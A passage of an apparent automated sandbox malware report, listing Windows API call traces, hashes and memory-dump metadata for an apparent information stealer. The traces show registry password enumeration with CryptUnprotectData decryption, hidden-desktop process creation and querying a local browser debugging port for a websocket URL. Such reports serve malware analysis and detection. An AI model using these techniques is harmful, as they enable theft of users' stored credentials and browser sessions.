                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248AFBA
                                                              • lstrcat.KERNEL32(00000000,0043509C), ref: 0248AFC6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248AFEF
                                                              • lstrlen.KERNEL32(0043509C), ref: 0248B001
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B023
                                                              • lstrcat.KERNEL32(00000000,0043509C), ref: 0248B02F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B058
                                                              • lstrlen.KERNEL32(00638DB8), ref: 0248B06E
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B096
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248B0A1
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B0CA
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248B106
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0248B110
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B136
                                                              • lstrlen.KERNEL32(00000000), ref: 0248B14C
                                                              • lstrcpy.KERNEL32(00000000,00638A98), ref: 0248B17F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$lstrlen
                                                              • String ID:
                                                              • API String ID: 2762123234-0
                                                              • Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                              • Instruction ID: 6539e08cd7cffed031cccb81f8a31b58877be844b00e2125931899fc23a1d030
                                                              • Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                              • Instruction Fuzzy Hash: 19B14A719116269FDB21FF79CC88AEF77B6AF41308F04052AE864A7650DBB4D900DF90
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02491A96
                                                              • lstrlen.KERNEL32(00638DEC), ref: 02491AA7
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491ACE
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02491AD9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491B08
                                                              • lstrlen.KERNEL32(00435564), ref: 02491B1A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491B3B
                                                              • lstrcat.KERNEL32(00000000,00435564), ref: 02491B47
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491B76
                                                              • lstrlen.KERNEL32(00638B1C), ref: 02491B8C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491BB3
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02491BBE
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491BED
                                                              • lstrlen.KERNEL32(00435564), ref: 02491BFF
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491C20
                                                              • lstrcat.KERNEL32(00000000,00435564), ref: 02491C2C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491C5B
                                                              • lstrlen.KERNEL32(00638D70), ref: 02491C71
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491C98
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02491CA3
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491CD2
                                                              • lstrlen.KERNEL32(00638D6C), ref: 02491CE8
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491D0F
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02491D1A
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02491D49
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcatlstrlen
                                                              • String ID:
                                                              • API String ID: 1049500425-0
                                                              • Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                              • Instruction ID: 6df395082f14ccacd33c32064068993e4c6b7a2cdc592ca9b7321e5bd7da77b3
                                                              • Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                              • Instruction Fuzzy Hash: CC9110B06007479FEB20DF79CC88A5BBBEAAF44349B14582EA899D3750DB74D841DF60
                                                              APIs
                                                              • CreateDesktopA.USER32(?), ref: 02479AEF
                                                              • memset.MSVCRT ref: 02479B0D
                                                              • lstrcat.KERNEL32(?,?), ref: 02479B22
                                                              • lstrcat.KERNEL32(?,?), ref: 02479B34
                                                              • lstrcat.KERNEL32(?,00435128), ref: 02479B44
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02479B81
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02479BB7
                                                              • StrStrA.SHLWAPI(?,00638C5C), ref: 02479BCC
                                                              • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02479BE9
                                                              • lstrlen.KERNEL32(?), ref: 02479BFD
                                                              • wsprintfA.USER32 ref: 02479C0D
                                                              • lstrcpy.KERNEL32(?,?), ref: 02479C24
                                                              • memset.MSVCRT ref: 02479C3A
                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000), ref: 02479C99
                                                              • Sleep.KERNEL32(00001388), ref: 02479CA8
                                                              • CloseDesktop.USER32(?), ref: 02479CE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$CreateDesktoplstrcpymemset$CloseFolderPathProcessSleeplstrcpynlstrlenwsprintf
                                                              • String ID: D
                                                              • API String ID: 3850938096-2746444292
                                                              • Opcode ID: 5eab061456a3bc98197d9bb77ac40b44eda55df27ed5337f7ac901d636f383d5
                                                              • Instruction ID: 38921e2fd3f2a672217dd052b413b2b68fbd8caa69502059933c96a21c233d26
                                                              • Opcode Fuzzy Hash: 5eab061456a3bc98197d9bb77ac40b44eda55df27ed5337f7ac901d636f383d5
                                                              • Instruction Fuzzy Hash: 66611DB1604340AFE720DF74DC45FDA7BE9AF88704F10491EFA9987291DBB499048BA6
                                                              APIs
                                                              • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                              • InternetCloseHandle.WININET(00000000), ref: 00409139
                                                              • strlen.MSVCRT ref: 00409155
                                                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
                                                              • InternetCloseHandle.WININET(00000000), ref: 004091D2
                                                              • InternetCloseHandle.WININET(00000000), ref: 004091D9
                                                              • strlen.MSVCRT ref: 004091EA
                                                              • strlen.MSVCRT ref: 0040921D
                                                              • strlen.MSVCRT ref: 0040925E
                                                                • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                                • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                                • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                              • strlen.MSVCRT ref: 0040927C
                                                                • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                              • API String ID: 4166274400-2144369209
                                                              • Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                              • Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
                                                              • Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                              • Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247B687
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B6D5
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B700
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0247B708
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B730
                                                              • lstrlen.KERNEL32(00435214), ref: 0247B7A7
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B7CB
                                                              • lstrcat.KERNEL32(00000000,00435214), ref: 0247B7D7
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B800
                                                              • lstrlen.KERNEL32(00000000), ref: 0247B884
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B8AE
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0247B8B6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B8DE
                                                              • lstrlen.KERNEL32(0043509C), ref: 0247B955
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B979
                                                              • lstrcat.KERNEL32(00000000,0043509C), ref: 0247B985
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247B9B5
                                                              • lstrlen.KERNEL32(?), ref: 0247BABE
                                                              • lstrlen.KERNEL32(?), ref: 0247BACD
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247BAF5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 2500673778-0
                                                              • Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                              • Instruction ID: 678e3e1ddb5d2e097c462596159664e51d665e244e0568f9523e27416a5851fd
                                                              • Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                              • Instruction Fuzzy Hash: 90023E70A01605CFDB24DF65C988AAABBF6EF4430CF19806ED8299B361D775D842CF90
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                              • strlen.MSVCRT ref: 004077BE
                                                              • StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                              • strlen.MSVCRT ref: 0040788D
                                                                • Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                                • Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                                • Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                                • Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                                • Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7
                                                              • strcpy_s.MSVCRT ref: 00407821
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                              • HeapFree.KERNEL32(00000000), ref: 00407833
                                                              • strlen.MSVCRT ref: 00407840
                                                              • strcpy_s.MSVCRT ref: 0040786A
                                                              • strlen.MSVCRT ref: 004078B4
                                                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                                              • String ID: Password
                                                              • API String ID: 3893107980-3434357891
                                                              • Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                              • Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
                                                              • Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                              • Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041F134
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041F162
                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
                                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
                                                              • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
                                                              • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
                                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
                                                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
                                                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                              • String ID: ERROR
                                                              • API String ID: 2137491262-2861137601
                                                              • Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                              • Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
                                                              • Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                              • Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248F39B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248F3C9
                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0248F3DD
                                                              • lstrlen.KERNEL32(00000000), ref: 0248F3EC
                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 0248F40A
                                                              • StrStrA.SHLWAPI(00000000,?), ref: 0248F438
                                                              • lstrlen.KERNEL32(?), ref: 0248F44B
                                                              • strtok.MSVCRT(00000001,?), ref: 0248F45D
                                                              • lstrlen.KERNEL32(00000000), ref: 0248F469
                                                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 0248F4B6
                                                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 0248F4F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                              • String ID: ERROR
                                                              • API String ID: 2137491262-2861137601
                                                              • Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
                                                              • Instruction ID: 1a9a2c64898b957d2591a70c6f109607bc246064cff26808feaf8097000e4454
                                                              • Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
                                                              • Instruction Fuzzy Hash: 42519A71A202559FCB21FF39CC48EAE7BA6AF84708F05451BEC599BA11DB74D805CB90
                                                              APIs
                                                              • GetEnvironmentVariableA.KERNEL32(00A0BB28,00639BD8,0000FFFF), ref: 0040A086
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
                                                              • lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
                                                              • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
                                                              • lstrlenA.KERNEL32(00435210), ref: 0040A0F5
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
                                                              • lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
                                                              • SetEnvironmentVariableA.KERNEL32(00A0BB28,00000000), ref: 0040A18F
                                                              • LoadLibraryA.KERNEL32(00A0EB10), ref: 0040A1A3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 2929475105-0
                                                              • Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                              • Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
                                                              • Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                              • Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6
                                                              APIs
                                                              • GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 0247A2ED
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247A31A
                                                              • lstrlen.KERNEL32(00639BD8), ref: 0247A327
                                                              • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0247A351
                                                              • lstrlen.KERNEL32(00435210), ref: 0247A35C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247A379
                                                              • lstrcat.KERNEL32(00000000,00435210), ref: 0247A385
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247A3AB
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0247A3B6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247A3DB
                                                              • SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 0247A3F6
                                                              • LoadLibraryA.KERNEL32(00638D78), ref: 0247A40A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 2929475105-0
                                                              • Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                              • Instruction ID: 1bd124a3a8e5d9bde36f3140fa6d269a9099a4101f2b1d11fbe93453597a9182
                                                              • Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                              • Instruction Fuzzy Hash: BE91BD71600A209FD7309F65DC88AEB37B7EB84709F50442AE8258B361EBB5D981CFD1
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
                                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD42
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
                                                              • lstrlenA.KERNEL32(0043509C), ref: 0040BE13
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 2500673778-0
                                                              • Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                              • Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
                                                              • Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                              • Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8
                                                              APIs
                                                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0248EB35
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248EB67
                                                              • lstrcat.KERNEL32(?,00000000), ref: 0248EB73
                                                              • lstrcat.KERNEL32(?,004354E4), ref: 0248EB8A
                                                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0248EBF3
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248EC27
